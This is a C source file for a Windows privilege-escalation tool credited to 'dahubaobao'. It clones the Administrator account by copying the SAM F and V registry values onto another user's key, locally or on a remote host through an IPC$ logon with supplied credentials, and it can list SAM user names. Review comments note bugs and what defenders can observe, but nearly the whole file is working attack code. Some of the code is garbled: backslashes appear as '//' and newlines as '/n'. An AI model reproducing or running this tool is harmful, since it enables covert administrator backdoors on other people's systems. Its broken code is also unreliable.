#define DEBUGMSG
#include <windows.h>
#include <winnetwk.h>
#include <tchar.h>
#include <stdio.h>
#pragma comment(lib,"mpr.lib")
// Sends a message to the debugger via OutputDebugString. NOTE(review): TEXT()
// only works on string literals; the TCHAR buffer passed at the MessageError
// call site would not compile in a UNICODE build — confirm the target charset.
#define Debug(x) OutputDebugString(TEXT(x))
// Shorthand for the thread's last-error value. NOTE(review): the Reg* APIs used
// in this file return their status code instead of setting the last-error value,
// so reports built from this macro after a registry failure may carry a stale code.
#define erron GetLastError()
#define ALLOCBUFFER (1024*10) // byte size of the buffers that receive the F and V values
#define REMOTE_HOST_LEN 20 // capacity, in TCHARs, of each IPCINFO string field
#define SET_CONNECT_IPC 0 // use an IPC$ connection (remote mode); also the zero-initialised default
#define NOT_CONNECT_IPC 1 // no IPC$ connection (local mode)
// Connection parameters: the remote host and the credentials handed to
// WNetAddConnection2, plus a flag selecting local or remote mode.
typedef struct ipcinfo
{
TCHAR RemoteIP[REMOTE_HOST_LEN]; // remote host address (filled by _tcsncpy in main, at most REMOTE_HOST_LEN-1 chars)
TCHAR RemoteUser[REMOTE_HOST_LEN]; // user name for the IPC$ logon
TCHAR RemotePass[REMOTE_HOST_LEN]; // password for the IPC$ logon; kept in clear text and never wiped
UINT IsIPC:1; // SET_CONNECT_IPC (0) or NOT_CONNECT_IPC (1)
}IPCINFO,*PIPCINFO,*LPIPCINFO;
// UNC name of the IPC$ share, built by ConnIPC and reused by main for WNetCancelConnection2.
TCHAR ipc[100]={0};
// Sub-key names collected by OpenKey. NOTE(review): OpenKey passes the whole 2-D
// array to _tcscat, which decays to a pointer to name[0], so the names are
// concatenated into the first row, whereas ListUser reads name[n] — confirm the
// intended layout.
TCHAR name[50][100]={0};
// Number of RegEnumKeyEx iterations performed by OpenKey, including the final
// failing one; ListUser therefore loops to KeyN-1.
DWORD KeyN=0;
// Copies the F and V values of the Administrator's SAM user key onto another user key ("account cloning")
BOOL CloneUser (IN TCHAR *CloneUser,IN LPIPCINFO lpIpcInfo);
BOOL OpenKey (IN TCHAR *OpenKey,IN HKEY ConnhKey); // open a sub-key and enumerate its children into name[]
BOOL ViewUser (IN TCHAR *ViewKey); // print the type of a key's default value
BOOL ListUser (IN LPIPCINFO lpIpcInfo); // list the user names found under the SAM Names key
BOOL ConnIPC (IN LPIPCINFO lpIpcInfo); // establish the IPC$ session
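// Error reporting: turns a Win32 error code into its system message and either
// prints it to stderr (MsgFlag != FALSE) or hands it to the debugger via Debug().
//   FuncName - name of the failed API, used as the message prefix
//   ErrorId  - Win32 error code. Callers in this file pass GetLastError(), which
//              the Reg* APIs do not set (they return their status), so the code
//              shown after a registry failure may be stale.
//   MsgFlag  - TRUE: write to stderr; FALSE: OutputDebugString
// Returns nothing. The buffer allocated by FormatMessage is always released.
inline void MessageError (const TCHAR *FuncName,DWORD ErrorId,BOOL MsgFlag)
{
    TCHAR *Message=NULL;
    TCHAR MsgError[MAX_PATH]={0};
    const TCHAR *Text=NULL;
    // FormatMessage allocates Message with LocalAlloc; on failure it returns 0
    // and Message stays NULL, which must not reach a %s conversion.
    if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,
        ErrorId,MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),(TCHAR *)&Message,0,NULL)==0 || Message==NULL)
    {
        Text=TEXT("(no system message)");
    }
    else
    {
        Text=Message;
    }
    // DWORD is unsigned long, so %lu rather than %d.
    if (MsgFlag)
    {
        _ftprintf(stderr,TEXT("%s GetLastError reports %lu and %s\n"),FuncName,ErrorId,Text);
    }
    else
    {
        // Bounded write: a system message can be longer than MAX_PATH. The buffer
        // is zero-initialised, so writing at most MAX_PATH-1 keeps a terminator
        // even when the output is truncated.
        _sntprintf(MsgError,MAX_PATH-1,TEXT("%s GetLastError reports %lu and %s\n"),FuncName,ErrorId,Text);
        Debug(MsgError);
    }
    // LocalFree(NULL) is a no-op, so no guard is needed.
    LocalFree(Message);
}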
// Copies the F and V values of the built-in Administrator's SAM user key
// (RID 0x1F4) onto the user key whose RID suffix is CloneUser, so that the
// target account ends up carrying the Administrator's account data ("account
// cloning"). What a defender can observe: an IPC$ logon plus a remote-registry
// connection in IPC mode, and RegSetValueEx writes to the F and V values of a
// key under the local SAM hive's Users key. Every key is opened with
// KEY_ALL_ACCESS, so the calls only succeed where the SAM key ACL grants it.
//   CloneUser  - at most five characters, appended to "00000" to form the
//                target user key name (length is enforced by main)
//   lpIpcInfo  - connection parameters; IsIPC selects where the source key is read
// Returns TRUE on success, FALSE after any failed step (details go to stderr
// when DEBUGMSG is defined).
// NOTE(review): the source key is opened on ConnhKey (the remote hive in IPC
// mode) while the target key is always opened on the local HKEY_LOCAL_MACHINE;
// the ConnhKey handle returned by RegConnectRegistry is never closed. The
// error code passed to MessageError comes from GetLastError(), which the Reg*
// APIs do not set — they return their status directly.
BOOL CloneUser (IN TCHAR *CloneUser,IN LPIPCINFO lpIpcInfo)
{
HKEY ConnhKey=NULL,hKey=NULL,ClonehKey=NULL;
LPBYTE lpDataF=NULL,lpDataV=NULL; // receive the raw F and V blobs
TCHAR CloneSid[100]={0},MachineName[20]={0};
DWORD lpSizeF=ALLOCBUFFER,lpSizeV=ALLOCBUFFER; // in: buffer capacity; out: bytes actually stored
DWORD RegType=REG_BINARY; // overwritten by RegQueryValueEx with the stored type; the writes use REG_BINARY explicitly
BOOL Flag=FALSE; // set on any failure; __leave then jumps to the __finally block
__try
{
if (lpIpcInfo->IsIPC==SET_CONNECT_IPC) // remote mode: IPC$ session first, then the remote registry
{
_tprintf(TEXT("Connect remote registry....../n"));
if (!(ConnIPC(lpIpcInfo)))
{
Flag=TRUE;
__leave;
}
// RemoteIP holds at most REMOTE_HOST_LEN-1 characters (see main), so it fits MachineName[20]
_tcscpy(MachineName,TEXT(""));
_tcscat(MachineName,lpIpcInfo->RemoteIP);
// Connect to the remote machine's HKEY_LOCAL_MACHINE
if (RegConnectRegistry(MachineName,HKEY_LOCAL_MACHINE,&ConnhKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegConnectRegistry()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
}
else
{
ConnhKey=HKEY_LOCAL_MACHINE; // local mode: predefined key, nothing to close
}
// Two ALLOCBUFFER-byte buffers, released in __finally
lpDataF=(LPBYTE) malloc (ALLOCBUFFER);
lpDataV=(LPBYTE) malloc (ALLOCBUFFER);
if (lpDataF==NULL || lpDataV==NULL)
{
#ifdef DEBUGMSG
// NOTE(review): a malloc failure is reported through errno, so GetLastError() here may be unrelated — confirm
MessageError("malloc()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
// Target key path: the Users key, "00000", then the caller-supplied RID suffix
_tcscpy(CloneSid,TEXT("SAM//SAM//Domains//Account//Users//00000"));
_tcscat(CloneSid,CloneUser);
// Open the Administrator's user key (RID 0x1F4) on ConnhKey; KEY_ALL_ACCESS is requested although only reads follow
if (RegOpenKeyEx(ConnhKey,TEXT("SAM//SAM//Domains//Account//Users//000001F4"),0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
// Read the F value; lpSizeF now holds its real length
if(RegQueryValueEx(hKey,TEXT("F"),NULL,&RegType,lpDataF,&lpSizeF)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegQueryValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
// Read the V value; lpSizeV now holds its real length
if(RegQueryValueEx(hKey,TEXT("V"),NULL,&RegType,lpDataV,&lpSizeV)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegQueryValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;;
}
// Open the target user key — always on the local HKEY_LOCAL_MACHINE, not on ConnhKey
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,CloneSid,0,KEY_ALL_ACCESS,&ClonehKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
// Overwrite the target's F value with the Administrator's
if (RegSetValueEx(ClonehKey,TEXT("F"),0,REG_BINARY,lpDataF,lpSizeF)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegSetValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
// Overwrite the target's V value with the Administrator's
if (RegSetValueEx(ClonehKey,TEXT("V"),0,REG_BINARY,lpDataV,lpSizeV)==ERROR_SUCCESS)
{
_tprintf(TEXT("Clone User Success/n"));
}
else
{
#ifdef DEBUGMSG
MessageError("RegSetValueEx()",erron,TRUE);
#endif
Flag=TRUE;
__leave;
}
}
__finally
{
// Runs on every exit path; ConnhKey is not released here
if (lpDataF)
free(lpDataF);
if (lpDataV)
free(lpDataV);
if (hKey)
RegCloseKey(hKey);
if (ClonehKey)
RegCloseKey(ClonehKey);
}
if (Flag)
return FALSE;
else
return TRUE;
}
// Opens OpenKey relative to ConnhKey and enumerates its sub-key names into the
// global name[] array, counting the iterations in the global KeyN.
//   OpenKey  - registry path relative to ConnhKey
//   ConnhKey - HKEY_LOCAL_MACHINE or the handle from RegConnectRegistry
// Returns FALSE if the key cannot be opened, TRUE otherwise (enumeration
// errors other than "no more items" are not distinguished).
// NOTE(review): KEY_ALL_ACCESS is requested although only enumeration is
// performed; KEY_ENUMERATE_SUB_KEYS would be the least-privilege mask.
BOOL OpenKey (IN TCHAR *OpenKey,IN HKEY ConnhKey)
{
HKEY hKey=NULL;
TCHAR TempName[100]={0},BufferName[100]={0}; // BufferName is never used
DWORD TempSize=100,ret=0; // ret starts at ERROR_SUCCESS (0), so the loop body runs at least once
if (RegOpenKeyEx(ConnhKey,OpenKey,0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegOpenKeyEx()",erron,TRUE); // erron is GetLastError(); RegOpenKeyEx returns its status instead of setting it
#endif
return FALSE;
}
// Runs until RegEnumKeyEx returns a non-success status; that final iteration
// still appends the (now empty) TempName and still bumps KeyN, which is why
// ListUser iterates to KeyN-1. i is incremented but never read.
for (DWORD i=0,Index=0; ret==ERROR_SUCCESS; i++,Index++,KeyN++)
{
// Fetch the next sub-key name
ret=RegEnumKeyEx(hKey,Index,TempName,&TempSize,NULL,NULL,NULL,NULL);
// NOTE(review): name is a 2-D array and decays to a pointer to name[0], so every
// name is concatenated into the first row with no bound check, while ListUser
// reads name[n] — confirm the intended layout.
_tcscat(name,TempName);
memset(TempName,0,sizeof (TempName));
// sizeof yields bytes, RegEnumKeyEx expects a TCHAR count; they agree only when TCHAR is char
TempSize=sizeof (TempName);
Sleep(50); // presumably pacing for remote enumeration — TODO confirm
}
if (hKey)
RegCloseKey(hKey);
return TRUE;
}
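// Opens ViewKey under the local HKEY_LOCAL_MACHINE, reads the type of the key's
// default value and prints it in hex. ListUser calls this once per entry under
// the SAM Names key, so the printed type is that entry's default-value type.
// Only the local hive is consulted, even when the caller is in IPC mode.
//   ViewKey - registry path relative to HKEY_LOCAL_MACHINE
// Returns TRUE if the type was read and printed, FALSE on either registry error
// (reported through MessageError when DEBUGMSG is defined).
BOOL ViewUser (IN TCHAR *ViewKey)
{
    HKEY hKey=NULL;
    DWORD RegType=0;
    LONG rc;
    // The Reg* APIs return their status code rather than setting the last-error
    // value, so the returned code is what gets reported.
    rc=RegOpenKeyEx(HKEY_LOCAL_MACHINE,ViewKey,0,KEY_ALL_ACCESS,&hKey);
    if (rc!=ERROR_SUCCESS)
    {
#ifdef DEBUGMSG
        MessageError("RegOpenKeyEx()",(DWORD)rc,TRUE);
#endif
        return FALSE;
    }
    // lpValueName NULL selects the default value; with lpData and lpcbData both
    // NULL only the value's type is retrieved.
    rc=RegQueryValueEx(hKey,NULL,NULL,&RegType,NULL,NULL);
    if (rc!=ERROR_SUCCESS)
    {
#ifdef DEBUGMSG
        // The failing call is RegQueryValueEx, so the report is labelled accordingly.
        MessageError("RegQueryValueEx()",(DWORD)rc,TRUE);
#endif
        RegCloseKey(hKey);
        return FALSE;
    }
    // DWORD is unsigned long: %lX, not %X.
    _tprintf(TEXT(" %lX\n"),RegType);
    RegCloseKey(hKey);
    return TRUE;
}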
// Lists the user names found under the SAM Names key: enumerates the sub-keys
// through OpenKey, then prints each name followed by the type of that entry's
// default value (through ViewUser). In IPC mode the enumeration runs against
// the remote hive, whereas ViewUser always reads the local HKEY_LOCAL_MACHINE.
//   lpIpcInfo - connection parameters; IsIPC selects local or remote enumeration
// Returns FALSE on the first failure, TRUE once every name has been shown.
// NOTE(review): the ConnhKey handle from RegConnectRegistry is never closed.
BOOL ListUser (IN LPIPCINFO lpIpcInfo)
{
HKEY ConnhKey=NULL;
TCHAR MachineName[20]={0};
TCHAR RegTemp[50]={0}; // display line: the name plus " ===>"
TCHAR RegBuffer[100]={TEXT("SAM//SAM//Domains//Account//Users//Names//")}; // 42-char prefix, one name appended per iteration
DWORD ret=0; // never used
if (lpIpcInfo->IsIPC==SET_CONNECT_IPC)
{
_tprintf(TEXT("Connect remote registry....../n"));
if (!(ConnIPC(lpIpcInfo)))
return FALSE;
// RemoteIP holds at most REMOTE_HOST_LEN-1 characters (see main), so it fits MachineName[20]
_tcscpy(MachineName,TEXT(""));
_tcscat(MachineName,lpIpcInfo->RemoteIP);
if (RegConnectRegistry(MachineName,HKEY_LOCAL_MACHINE,&ConnhKey)!=ERROR_SUCCESS)
{
#ifdef DEBUGMSG
MessageError("RegConnectRegistry()",erron,TRUE); // erron may be stale: the Reg* APIs return their status instead of setting it
#endif
return FALSE;
}
}
else
{
ConnhKey=HKEY_LOCAL_MACHINE;
}
// Fills the global name[] and KeyN
if (!(OpenKey(TEXT("SAM//SAM//Domains//Account//Users//Names"),ConnhKey)))
return FALSE;
// KeyN also counts OpenKey's final, failing iteration, hence KeyN-1. OpenKey
// always runs at least one iteration, so KeyN is at least 1 here and the
// unsigned subtraction cannot wrap.
for (DWORD n=0; n<KeyN-1; n++)
{
// NOTE(review): no bound check — name[n] may hold up to 99 TCHARs, but only
// 57 fit after the prefix in RegBuffer, and RegTemp below has room for 49.
_tcscat(RegBuffer,name[n]);
// NOTE(review): name[n] is data read from the registry yet is used as the
// format string (CERT FIO30-C); wsprintf(RegTemp,TEXT("%s"),name[n]) would be
// the safe form. wsprintf has no length bound either.
wsprintf(RegTemp,name[n]);
_tcscat(RegTemp,TEXT(" ===>"));
_tprintf(TEXT("%s"),RegTemp);
// ViewUser opens the path on the local HKEY_LOCAL_MACHINE regardless of IsIPC
if (!(ViewUser(RegBuffer)))
return FALSE;
// Restore the prefix for the next name
_tcscpy(RegBuffer,TEXT("SAM//SAM//Domains//Account//Users//Names//"));
Sleep(10);
}
return TRUE;
}
// Opens a session to the IPC$ share of lpIpcInfo->RemoteIP with the supplied
// user name and password through WNetAddConnection2. The share name is built
// into the global ipc so that main can cancel the session afterwards. On the
// remote host this appears as an ordinary network logon with those credentials.
//   lpIpcInfo - remote host and credentials
// Returns TRUE on success, FALSE if WNetAddConnection2 returns an error code.
BOOL ConnIPC (IN LPIPCINFO lpIpcInfo)
{
// NOTE(review): the members not assigned below (dwScope, dwDisplayType, dwUsage,
// lpComment) are left indeterminate; NETRESOURCE nr={0}; would be the conventional form.
NETRESOURCE nr;
// NOTE(review): sizeof(ipc)-1 is a byte count while _sntprintf takes an element
// count — the two coincide only when TCHAR is char. ipc is zero-initialised, so
// the -1 keeps a terminator when the output is truncated.
_sntprintf(ipc,sizeof (ipc)-1,TEXT("%s//ipc$"),lpIpcInfo->RemoteIP);
nr.lpLocalName=NULL; // no local device name: a device-less connection
nr.lpProvider=NULL; // let the system choose the provider
nr.dwType=RESOURCETYPE_ANY;
nr.lpRemoteName=ipc;
// WNetAddConnection2 returns NO_ERROR (0) on success, otherwise the error code itself
if (WNetAddConnection2(&nr,lpIpcInfo->RemotePass,lpIpcInfo->RemoteUser,0))
{
#ifdef DEBUGMSG
// NOTE(review): the status is the return value just tested; GetLastError() need not carry it
MessageError("WNetAddConnection2()",erron,TRUE);
#endif
return FALSE;
}
return TRUE;
}
// Entry point. Argument forms handled:
//   (no args)                      print the banner
//   -c <rid>                       clone locally (argc==3)
//   -c <rid> <ip> <user> <pass>    clone with the remote hive as source (argc==6)
//   -l                             list local user names (argc==2)
//   -l <ip> <user> <pass>          list remote user names (argc==5)
// <rid> is limited to five characters; host, user and password are copied into
// the fixed REMOTE_HOST_LEN fields with _tcsncpy (the zero-initialised struct
// keeps the terminator). Credentials given on the command line are exposed to
// process listings and shell history, and the password stays in IpcInfo for the
// lifetime of the process. Any other argc falls through.
// Returns 0 on every path, so the exit status does not signal failure.
// NOTE(review): IpcInfo={0} makes IsIPC equal to SET_CONNECT_IPC (0) by default,
// so the WNetCancelConnection2 block at the end also runs — with an empty share
// name — whenever no argument form matched or "-c"/"-l" did not match.
// NOTE(review): argv is declared TCHAR* but the entry point is main rather than
// _tmain, which only lines up in a non-UNICODE build.
int main (int argc,TCHAR *argv[])
{
IPCINFO IpcInfo={0};
if (argc==1)
{
_tprintf(TEXT("Code by dahubaobao/n"));
return 0;
}
if (argc==3) // local clone
{
if (_tcsicmp(argv[1],TEXT("-c"))==0)
{
if (_tcslen(argv[2])>5)
{
_tprintf(TEXT("User sid no larger than /"5/"/n"));
return 0;
}
IpcInfo.IsIPC=NOT_CONNECT_IPC; // no IPC$ session
if (!(CloneUser(argv[2],&IpcInfo)))
return 0;
}
}
if (argc==6) // remote clone
{
if (_tcsicmp(argv[1],TEXT("-c"))==0)
{
if (_tcslen(argv[2])>5)
{
_tprintf(TEXT("User sid no larger than /"5/"/n"));
return 0;
}
IpcInfo.IsIPC=SET_CONNECT_IPC; // IPC$ session
// REMOTE_HOST_LEN-1 leaves the last, already-zero element as terminator
_tcsncpy(IpcInfo.RemoteIP,argv[3],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemoteUser,argv[4],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemotePass,argv[5],REMOTE_HOST_LEN-1);
if (!(CloneUser(argv[2],&IpcInfo)))
return 0;
}
}
if (argc==2) // list local users
{
if (_tcsicmp(argv[1],TEXT("-l"))==0)
{
IpcInfo.IsIPC=NOT_CONNECT_IPC;
if (!(ListUser(&IpcInfo)))
return 0;
}
}
if (argc==5) // list remote users
{
if (_tcsicmp(argv[1],TEXT("-l"))==0)
{
IpcInfo.IsIPC=SET_CONNECT_IPC;
_tcsncpy(IpcInfo.RemoteIP,argv[2],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemoteUser,argv[3],REMOTE_HOST_LEN-1);
_tcsncpy(IpcInfo.RemotePass,argv[4],REMOTE_HOST_LEN-1);
if (!(ListUser(&IpcInfo)))
return 0;
}
}
// Reached with IsIPC==0 both after a remote run and, via the zero initialiser, when no branch above applied
if (IpcInfo.IsIPC==SET_CONNECT_IPC)
{
if (WNetCancelConnection2(ipc,0,TRUE)) // drop the IPC$ session recorded in ipc; non-zero is an error code
{
#ifdef DEBUGMSG
MessageError("WNetCancelConnection2()",erron,TRUE);
#endif
return 0;
}
}
return 0;
}
来源:dahu_baobao